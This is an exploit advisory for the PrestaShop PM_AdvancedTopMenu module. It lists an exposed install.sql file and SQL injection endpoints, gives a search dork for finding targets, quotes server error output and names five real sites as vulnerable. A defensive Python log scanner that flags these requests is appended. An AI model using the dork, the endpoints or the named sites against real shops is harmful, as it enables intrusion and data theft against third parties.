PrestaShop PM_AdvancedTopMenu Modules 1.4.6.2 Database Disclosure and SQL Injection

2019.01.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################################################
# Exploit Title : PrestaShop PM_AdvancedTopMenu Modules 1.4.6.2 Database Disclosure and SQL Injection
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/01/2019
# Vendor Homepage : prestashop.com
# Software Download Link : presta-module.com/en/3-prestashop-addons/7-appearance/6-advanced-top-menu.html
#   + prestashop.com/forums/topic/89175-module-pm-advancedtopmenu/
#   + addons.prestashop.com/en/menu/2072-advanced-top-menu-responsive.html
# Software Price : 50$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.10.0 - 1.4.7.0 - 1.4.6.2
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/pm_advancedtopmenu/'' intext:''Hexagone High-Tech se fournit chez'' intext:''création: webncie // © Eight-Racing.com 2013-2014 tous droits réservés''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
#   CWE-23 - [ Relative Path Traversal ]
#   CWE-200 - [ Information Exposure ]
#   CWE-89 - [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity Exploit Reference Link : packetstormsecurity.com/files/150907/PrestaShop-PM_AdvancedTopMenu-1.4.6.2-Database-Disclosure-SQL-Injection.html
#################################################################################################
# Database Disclosure Exploit :

/modules/pm_advancedtopmenu/install.sql

# SQL Injection Exploit :

/modules/pm_advancedtopmenu/pm_advancedtopmenu.php?id=[SQL Injection]
/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php?id=[SQL Injection]
/modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php?id=[SQL Injection]
/modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php?id=[SQL Injection]

#################################################################################################
# Example SQL Database Error =>

Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 19
Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 19
Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 20
Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 20
Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 21
Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 21
Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuElementsClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 22
Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuElementsClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 22
Fatal error: Class 'Module' not found in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 23
Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php on line 13
Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php on line 13
Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/hexagone.mg/modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php on line 13

#################################################################################################
# Example Vulnerable Sites =>

[+] hexagone.mg/modules/pm_advancedtopmenu/install.sql
[+] griffin.ch/modules/pm_advancedtopmenu/install.sql
[+] eight-racing.com/modules/pm_advancedtopmenu/install.sql
[+] domaine-vial.fr/modules/pm_advancedtopmenu/install.sql
[+] tecnicamurciana.es/modules/pm_advancedtopmenu/install.sql

#################################################################################################
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
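A defender-side addition that is not part of the advisory: a small Python scanner that flags web-server log entries matching the two exposure patterns named above (direct fetches of the module's install.sql, and direct requests to the module's PHP class files, with a non-numeric id treated as the injection pattern). The log lines are constructed samples, and the css/menu.css asset path is assumed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Paths taken from the advisory: the module directory, the disclosed
# SQL file and the PHP files that take an "id" parameter.
MODULE_DIR = "/modules/pm_advancedtopmenu/"
ID_SCRIPTS = {
    "pm_advancedtopmenu.php",
    "AdvancedTopMenuClass.php",
    "AdvancedTopMenuColumnClass.php",
    "AdvancedTopMenuColumnWrapClass.php",
}

# Common/combined log format; only the client, target and status are kept.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" (?P<status>\d{3})')

def classify(target):
    """Label one request target, or return None when it is not of interest."""
    parts = urlsplit(target)
    name = unquote(parts.path)  # decode %xx so an encoded path is not missed
    if not name.startswith(MODULE_DIR):
        return None
    name = name[len(MODULE_DIR):]
    if name == "install.sql":
        return "install_sql_disclosure"
    if name in ID_SCRIPTS:
        # These files are meant to be included by PrestaShop, never requested
        # directly; a non-numeric id on such a request is the injection pattern.
        ids = parse_qs(parts.query).get("id", [])
        if any(not v.isdigit() for v in ids):
            return "id_param_tamper"
        return "direct_module_file_access"
    return None

def scan(lines):
    """Return (client, label, target, status) for every flagged log line."""
    findings = []
    for m in filter(None, map(LOG_RE.match, lines)):
        label = classify(m.group("target"))
        if label:
            findings.append((m.group("ip"), label, m.group("target"), m.group("status")))
    return findings

# Constructed sample log lines (not from the advisory); css/menu.css is an assumed benign asset.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2019:10:15:01 +0100] "GET /modules/pm_advancedtopmenu/install.sql HTTP/1.1" 200 4120
203.0.113.5 - - [01/Jan/2019:10:15:09 +0100] "GET /modules/pm_advancedtopmenu/AdvancedTopMenuClass.php?id=1%27 HTTP/1.1" 500 812
198.51.100.7 - - [01/Jan/2019:10:16:00 +0100] "GET /modules/pm_advancedtopmenu/css/menu.css HTTP/1.1" 200 1933
198.51.100.7 - - [01/Jan/2019:10:16:30 +0100] "GET /index.php?id_product=12 HTTP/1.1" 200 54210
"""
```

Run `scan(SAMPLE_LOG.splitlines())` to see the two flagged requests; a 200 on the install.sql hit is the disclosure itself, while the 500 on the class file matches the PHP errors quoted in the advisory.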